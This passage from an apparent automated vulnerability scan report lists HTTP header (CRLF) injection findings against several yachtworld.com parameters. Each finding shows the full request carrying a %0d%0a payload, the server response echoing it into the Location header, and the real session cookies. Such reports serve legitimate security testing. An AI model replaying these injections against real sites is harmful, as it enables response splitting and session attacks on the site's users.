s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 27 Jan 2011 19:57:52 GMT
Server: Apache
Cache-Control: private
Location: /boats/category/type/78c71
9de75d3bc43

Connection: close
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 842
Content-Type: text/html; charset=utf-8


<!--
- Unfortunately, Microsoft has added a clever new
- "feature" to Internet Explorer. If the text in
- an error's message is "too small", specifically
- less than 512 bytes, Intern
...[SNIP]...

2.2. http://www.yachtworld.com/boats/Sail/1 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /boats/Sail/1

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload a9e7b%0d%0a05f58214b4d was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /boats/a9e7b%0d%0a05f58214b4d/1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 301 Moved Permanently
Date: Thu, 27 Jan 2011 19:59:34 GMT
Server: Apache
Cache-Control: private
Location: /boats/category/type/a9e7b
05f58214b4d

Connection: close
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Length: 842
Content-Type: text/html; charset=utf-8


<!--
- Unfortunately, Microsoft has added a clever new
- "feature" to Internet Explorer. If the text in
- an error's message is "too small", specifically
- less than 512 bytes, Intern
...[SNIP]...

2.3. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [&ywo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the &ywo request parameter is copied into the Location response header. The payload a2fcb%0d%0adec8bd846ab was submitted in the &ywo parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=a2fcb%0d%0adec8bd846ab& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:40:53 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=a2fcb
dec8bd846ab
&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 187

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=a2fcb
dec8bd846ab&">here</a>

2.4. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [hosturl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the hosturl request parameter is copied into the Location response header. The payload 5e98e%0d%0a04055d8196f was submitted in the hosturl parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=5e98e%0d%0a04055d8196f&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:37 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=5e98e
04055d8196f
&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 187

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=broker&&hosturl=5e98e
04055d8196f&&ywo=starlingmarine&">here</a>

2.5. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [slim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the Location response header. The payload a0d07%0d%0ac827c8a1387 was submitted in the slim parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=a0d07%0d%0ac827c8a1387&hosturl=starlingmarine&units=Feet&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:07 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=a0d07
c827c8a1387
&&hosturl=starlingmarine&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 195

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=Feet&id=2275416&lang=en&slim=a0d07
c827c8a1387&&hosturl=starlingmarine&&ywo=starlingmarine&">here</a>

2.6. http://www.yachtworld.com/core/listing/pl_boat_detail_handler.jsp [units parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /core/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the units request parameter is copied into the Location response header. The payload edada%0d%0acbdfc443266 was submitted in the units parameter. This caused a response containing an injected HTTP header.

Request

GET /core/listing/pl_boat_detail_handler.jsp?slim=broker&hosturl=starlingmarine&units=edada%0d%0acbdfc443266&boat_id=2275416&primary_photo_id=1&back=%2Fcore%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fps%3D50%26slim%3Dbroker%26page%3Dbroker%26ywo%3Dstarlingmarine%26hosturl%3Dstarlingmarine%26luom%3D126&searchtype=buy&hosturl=starlingmarine&&ywo=starlingmarine& HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.3.10.1296155835; s_pers=%20s_nr%3D1296155882977%7C1298747882977%3B%20s_lv%3D1296155882978%7C1390763882978%3B%20s_lv_s%3DFirst%2520Visit%7C1296157682978%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20s_sq%3D%3B

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:39:55 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=edada
cbdfc443266
&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine&
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 197

The URL has moved <a href="http://www.yachtworld.com/core/listing/pl_boat_detail.jsp?&units=edada
cbdfc443266&id=2275416&lang=en&slim=broker&&hosturl=starlingmarine&&ywo=starlingmarine&">here</a>

2.7. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [currency parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the currency request parameter is copied into the Location response header. The payload 3e221%0d%0a5b524a18b0d was submitted in the currency parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=3e221%0d%0a5b524a18b0d&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:29 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=3e221
5b524a18b0d
&units=Feet&id=2267335&lang=en&slim=pp279757&
Content-Length: 176
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=3e221
5b524a18b0d&units=Feet&id=2267335&lang=en&slim=pp279757&">here</a>

2.8. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yachtworld.com
Path:   /privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the Location response header. The payload d9915%0d%0a0e475e20fcd was submitted in the slim parameter. This caused a response containing an injected HTTP header.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=d9915%0d%0a0e475e20fcd&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 302 Found
Date: Thu, 27 Jan 2011 20:01:27 GMT
Server: Apache
Cache-Control: private
Location: http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=Feet&id=2267335&lang=en&slim=d9915
0e475e20fcd
&
Content-Length: 171
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

The URL has moved <a href="http://www.yachtworld.com/privatelabel/listing/pl_boat_detail.jsp?currency=USD&units=Feet&id=2267335&lang=en&slim=d9915
